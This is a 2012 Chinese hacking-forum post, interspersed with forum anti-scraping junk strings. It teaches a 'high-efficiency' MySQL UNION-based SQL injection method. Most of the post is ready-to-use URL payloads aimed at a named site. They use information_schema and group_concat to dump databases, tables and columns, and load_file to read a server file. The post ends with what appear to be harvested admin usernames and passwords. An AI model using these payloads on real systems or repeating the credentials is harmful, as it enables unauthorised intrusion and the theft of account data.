中国网络渗透测试联盟

标题: mysql注入高效方法 [打印本页]

作者: admin    时间: 2012-9-13 16:37
标题: mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似! P( B& ~( T4 A2 _, L3 v
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
# H: c6 B3 i% w& _/ r$ ^
3 l& ^+ y2 V6 O- `4 ^6 t/ \; p# L2 x- ]6 J
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
6 z  y7 S: F4 d, D. f( G" k+ P6 n) o) m! r
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢.../ @. n0 S8 t; {8 h, d2 e0 B- I

4 n, g0 Z" d1 v下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
6 V$ E5 a; P1 R& ]% J% A在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等
6 @6 [) X7 ~8 E1 u0 }1 s
* D3 l( W( j$ K8 X9 Mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,176 L3 L; D, p8 k2 L8 y( Y
0 I3 `! v* \9 v0 U2 `: q
读出所有库:
; F8 n7 r& Q( Ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
; V" a0 z5 U  M& U' Y* s3 U$ h% {8 l% j6 }: X% \1 W; F4 Z& ?
% s, x2 F- y, x: G4 S. R  d: c

/ V* ]. D- g1 S; u% Y; ?8 A读出所有表:
8 t* _5 ?2 ]1 u! a. ~9 `  {5 Qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
+ h5 ~6 D. U+ N& c
' @- x0 {1 F7 w读出所有表字段:
' a3 U& J$ `8 |# l6 ^( @) ghttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)6 Q5 W) j* d& i1 D
*/ (97,100,109,105,110)为admin的ascii码 依次类推
; [( t: t0 ]0 T+ S7 D3 I  \% q- J( L/ ^( V, d
读出所有表字段里的内容:7 C! q+ O' I0 [" c, i- _0 {% J3 O* o
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
2 H" H/ ?" V" G7 y. z2 |8 \) ~2 ?$ d+ D
7 i) d* e+ P& }
7 ~* {) R$ ]5 \, j5 h: b

7 O% d, _  x" X: o6 F
5 Q" y- o  A, F5 H5 S* V9 _# W; {
# ~6 ^! c7 F/ C2 phttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23) y: w* U5 s" p- K1 {( i  Q( g

- \3 L: V3 ]' r$ X
, k9 X/ k7 v' Z  Vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
/ c5 N4 l9 |) m& P# x' Y" }, Q4 P+ v* d5 o+ B- x* g4 y& {
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%233 M+ p0 E3 O" S0 ?3 m/ {* e! Z

0 [! z! ~6 Z! p6 h" J
( w6 p+ \- W% v$ Xhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
) K& @4 T, F  T' p6 ?. ?& {6 @/ r1 ~, s4 ^  H: S
0 P* E3 A) W4 p& B2 s' r
        webmaster:dzb521123,simlab:simadmin20043233
" q( ]8 w, s% x5 ]& v




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2